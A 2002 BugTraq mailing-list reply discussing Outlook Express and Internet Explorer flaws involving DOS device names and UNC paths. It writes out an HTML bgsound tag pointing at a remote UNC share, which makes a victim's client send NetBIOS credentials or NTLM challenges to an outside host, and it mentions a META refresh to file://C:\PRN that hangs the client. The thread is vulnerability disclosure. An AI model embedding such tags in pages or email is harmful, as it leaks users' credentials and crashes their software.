[25489] in bugtraq
Re[2]: dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express
daemon@ATHENA.MIT.EDU (3APA3A)
Fri May 17 17:16:47 2002
Date: Fri, 17 May 2002 21:23:42 +0400
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Message-ID: <9088739901.20020517212342@SECURITY.NNOV.RU>
To: Chad Loder <cloder@acm.org>
Cc: "ERRor" <error@pochtamt.ru>, bugtraq@securityfocus.com
In-Reply-To: <5.1.0.14.2.20020517022537.02df95e8@pop-server.socal.rr.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit
Dear Chad Loder,
You're right! <bgsound src=3D"\\111.111.111.111\new\file.wav"> causes IE
to connect to 111.111.111.111 via NetBT. Depending on
LMCompatibilityLevel it may cause user's cleartext password or NTLMv1
challenge to leak. It's very serious bug.
--Friday, May 17, 2002, 1:38:16 PM, you wrote to error@pochtamt.ru:
CL> At Wednesday 5/15/2002 03:11 PM +0400, you wrote:
>> Title: Special device access and DoS in Microsoft Internet
>> Exporer/Outlook Express/Outlook
>>
>> All versions of Windows have a reserved filenames referred to special
>> devices such as prn, aux, nul, etc also called DOS devices.
CL> This might be related to a vulnerability that was reported to Microsoft
CL> on Mar 7 2001. See the BugTraq post:
CL> http://online.securityfocus.com/archive/1/197926
CL> The META HTTP-EQUIV=REFRESH tag used to do the trick
CL> from Outlook and other email clients using the MS
CL> HTML viewer (e.g. Eudora). Redirecting to file://C:\PRN
CL> was sufficient to hang the browser or email client.
CL> Microsoft assigned the following internal tracking
CL> number to the issue: "MSRC 673au", and fixed it in
CL> MS00-17. Obviously they didn't do a good enough
CL> job, since you guys found a way to print files, etc. :)
CL> Another scary thing is that you can cause the computer to connect
CL> to arbitrary UNC paths, which as you know, involves sending
CL> NetBIOS credentials over the wire (a good reason to use egress
CL> filtering).
CL> +--------------------------------
CL> Chad Loder <chad@rapid7.com>
CL> Rapid 7, Inc.
CL> <http://www.rapid7.com>
CL> +--------------------------------
--
~/ZARAZA
Существую лишь я сам, никуда не летя. (Лем)
